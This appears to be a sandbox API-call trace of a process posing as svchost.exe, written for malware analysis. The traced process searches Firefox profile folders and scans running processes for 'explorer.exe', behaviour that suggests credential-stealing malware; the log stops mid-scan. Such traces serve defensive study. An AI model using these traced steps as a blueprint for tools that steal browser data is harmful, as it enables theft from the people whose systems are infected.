	[0188.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5b45d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f
	[0188.393] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x27dd58
	[0188.393] GetEnvironmentStringsW () returned 0x285778*
	[0188.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1097, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1097
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x449) returned 0x286018
	[0188.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1097, lpMultiByteStr=0x286018, cbMultiByte=1097, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1097
	[0188.394] FreeEnvironmentStringsW (penv=0x285778) returned 1
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x78) returned 0x271930
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x284a60
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x2779e0
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x280398
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x27dd78
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x2799f0
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x27dd98
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x44) returned 0x277a30
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x27ddb8
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x27a878
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x8d) returned 0x2803d8
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x2745b8
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x284a88
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x44) returned 0x277a80
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x27ddd8
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x27ddf8
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x284ab0
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x284ad8
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x277ad0
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x27de18
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x285790
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x27de38
	[0188.394] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x27de58
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x27de78
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x27de98
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x13) returned 0x27deb8
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x35) returned 0x280470
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x27ded8
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x27def8
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x277b20
	[0188.395] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286018 | out: hHeap=0x260000) returned 1
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8) returned 0x27e5b8
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x284c40
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x27e690
	[0188.395] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e690 | out: hHeap=0x260000) returned 1
	[0188.395] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x27e690
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8) returned 0x280670
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27df18
	[0188.396] GetLastError () returned 0x0
	[0188.396] SetLastError (dwErrCode=0x0) 
	[0188.396] GetLastError () returned 0x0
	[0188.396] SetLastError (dwErrCode=0x0) 
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xb8) returned 0x27f990
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6a6) returned 0x285b78
	[0188.396] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285b78 | out: hHeap=0x260000) returned 1
	[0188.396] GetLastError () returned 0x0
	[0188.396] SetLastError (dwErrCode=0x0) 
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6) returned 0x281938
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x285b90
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x4) returned 0x285ba0
	[0188.396] GetLastError () returned 0x0
	[0188.396] SetLastError (dwErrCode=0x0) 
	[0188.396] GetLastError () returned 0x0
	[0188.396] SetLastError (dwErrCode=0x0) 
	[0188.396] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xb8) returned 0x285f78
	[0188.396] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6a6) returned 0x286038
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286038 | out: hHeap=0x260000) returned 1
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x281938 | out: hHeap=0x260000) returned 1
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27f990 | out: hHeap=0x260000) returned 1
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285ba0 | out: hHeap=0x260000) returned 1
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6) returned 0x285ba0
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x285bb0
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x200) returned 0x286038
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x4) returned 0x285bc0
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xb8) returned 0x27f990
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6a6) returned 0x286240
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286240 | out: hHeap=0x260000) returned 1
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285ba0 | out: hHeap=0x260000) returned 1
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285f78 | out: hHeap=0x260000) returned 1
	[0188.397] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285bc0 | out: hHeap=0x260000) returned 1
	[0188.397] GetLastError () returned 0x0
	[0188.397] SetLastError (dwErrCode=0x0) 
	[0188.397] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x6) returned 0x285bc0
	[0188.398] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285bb0 | out: hHeap=0x260000) returned 1
	[0188.398] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x285b90 | out: hHeap=0x260000) returned 1
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8) returned 0x285b90
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27df38
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274600
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x2857a8
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274648
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x2857c0
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274690
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x2857d8
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x2746d8
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x2857f0
	[0188.398] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274720
	[0188.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x100048fa, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x10090ab8 | out: lpThreadId=0x10090ab8*=0x7e4) returned 0x98
	[0188.399] GetExitCodeThread (in: hThread=0x98, lpExitCode=0x1dfb64 | out: lpExitCode=0x1dfb64) returned 1
	[0188.399] GetFileAttributesA (lpFileName="C:\\Program Files\\Mozilla Firefox" (normalized: "c:\\program files\\mozilla firefox")) returned 0x10
	[0188.399] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1df510, csidl=26, fCreate=1 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1
	[0188.406] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274768
	[0188.406] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x27fa50
	[0188.406] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274768 | out: hHeap=0x260000) returned 1
	[0188.406] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x286c10
	[0188.407] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*", lpFindFileData=0x1df618 | out: lpFindFileData=0x1df618*(dwFileAttributes=0x730065, ftCreationTime.dwLowDateTime=0x4d005c, ftCreationTime.dwHighDateTime=0x7a006f, ftLastAccessTime.dwLowDateTime=0x6c0069, ftLastAccessTime.dwHighDateTime=0x61006c, ftLastWriteTime.dwLowDateTime=0x460020, ftLastWriteTime.dwHighDateTime=0x720069, nFileSizeHigh=0x660065, nFileSizeLow=0x78006f, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="pe8wÒèõw")) returned 0xffffffff
	[0188.407] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286c10 | out: hHeap=0x260000) returned 1
	[0188.407] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27fa50 | out: hHeap=0x260000) returned 1
	[0188.407] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1df510, csidl=28, fCreate=1 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1
	[0188.413] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274768
	[0188.413] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x287410
	[0188.413] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274768 | out: hHeap=0x260000) returned 1
	[0188.413] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x287478
	[0188.413] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\\\*", lpFindFileData=0x1df618 | out: lpFindFileData=0x1df618*(dwFileAttributes=0x730065, ftCreationTime.dwLowDateTime=0x4d005c, ftCreationTime.dwHighDateTime=0x7a006f, ftLastAccessTime.dwLowDateTime=0x6c0069, ftLastAccessTime.dwHighDateTime=0x61006c, ftLastWriteTime.dwLowDateTime=0x460020, ftLastWriteTime.dwHighDateTime=0x720069, nFileSizeHigh=0x660065, nFileSizeLow=0x78006f, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="pe8wÒèõw")) returned 0xffffffff
	[0188.413] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287478 | out: hHeap=0x260000) returned 1
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287410 | out: hHeap=0x260000) returned 1
	[0188.414] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1df5c8, csidl=26, fCreate=1 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1
	[0188.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274768
	[0188.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x287410
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274768 | out: hHeap=0x260000) returned 1
	[0188.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x287478
	[0188.414] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*", lpFindFileData=0x1df6d0 | out: lpFindFileData=0x1df6d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x08ø\x1d")) returned 0xffffffff
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287478 | out: hHeap=0x260000) returned 1
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287410 | out: hHeap=0x260000) returned 1
	[0188.414] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1df5c8, csidl=28, fCreate=1 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1
	[0188.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x274768
	[0188.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x287410
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274768 | out: hHeap=0x260000) returned 1
	[0188.414] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x287478
	[0188.414] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\\\*", lpFindFileData=0x1df6d0 | out: lpFindFileData=0x1df6d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x08ø\x1d")) returned 0xffffffff
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287478 | out: hHeap=0x260000) returned 1
	[0188.414] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x287410 | out: hHeap=0x260000) returned 1
	[0188.414] SetLastError (dwErrCode=0x0) 
	[0188.415] GetCurrentProcessId () returned 0x110
	[0188.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c
	[0188.418] Process32First (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0188.419] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0188.420] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0188.420] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x104) returned 0x110
	[0188.420] StrStrIA (lpFirst="smss.exe", lpSrch="explorer.exe") returned 0x0
	[0188.421] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0188.421] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x148) returned 0x114
	[0188.421] StrStrIA (lpFirst="csrss.exe", lpSrch="explorer.exe") returned 0x0
	[0188.422] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0188.422] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x178) returned 0x118
	[0188.422] StrStrIA (lpFirst="wininit.exe", lpSrch="explorer.exe") returned 0x0
	[0188.422] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0188.423] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x184) returned 0x11c
	[0188.423] StrStrIA (lpFirst="csrss.exe", lpSrch="explorer.exe") returned 0x0
	[0188.423] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0188.424] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1ac) returned 0x120
	[0188.424] StrStrIA (lpFirst="winlogon.exe", lpSrch="explorer.exe") returned 0x0
	[0188.424] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0188.425] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1d8) returned 0x124
	[0188.425] StrStrIA (lpFirst="services.exe", lpSrch="explorer.exe") returned 0x0
	[0188.425] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0188.426] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1e0) returned 0x128
	[0188.426] StrStrIA (lpFirst="lsass.exe", lpSrch="explorer.exe") returned 0x0
	[0188.426] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0188.427] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x1e8) returned 0x12c
	[0188.427] StrStrIA (lpFirst="lsm.exe", lpSrch="explorer.exe") returned 0x0
	[0188.427] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.427] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x250) returned 0x130
	[0188.428] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.428] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.428] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x290) returned 0x134
	[0188.428] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.429] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.429] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x2c4) returned 0x138
	[0188.429] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.430] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.430] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x324) returned 0x13c
	[0188.430] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.430] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.431] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x34c) returned 0x140
	[0188.431] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.431] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.432] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x3e4) returned 0x144
	[0188.432] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.432] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.433] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x42c) returned 0x148
	[0188.433] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.433] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0188.434] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x4c8) returned 0x14c
	[0188.434] StrStrIA (lpFirst="spoolsv.exe", lpSrch="explorer.exe") returned 0x0
	[0188.434] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0188.435] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x4f0) returned 0x150
	[0188.435] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.435] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0188.436] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x54c) returned 0x154
	[0188.436] StrStrIA (lpFirst="taskhost.exe", lpSrch="explorer.exe") returned 0x0
	[0188.436] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0188.437] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x590) returned 0x158
	[0188.437] StrStrIA (lpFirst="taskeng.exe", lpSrch="explorer.exe") returned 0x0
	[0188.437] Process32Next (in: hSnapshot=0x10c, lppe=0x1df6c8 | out: lppe=0x1df6c8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
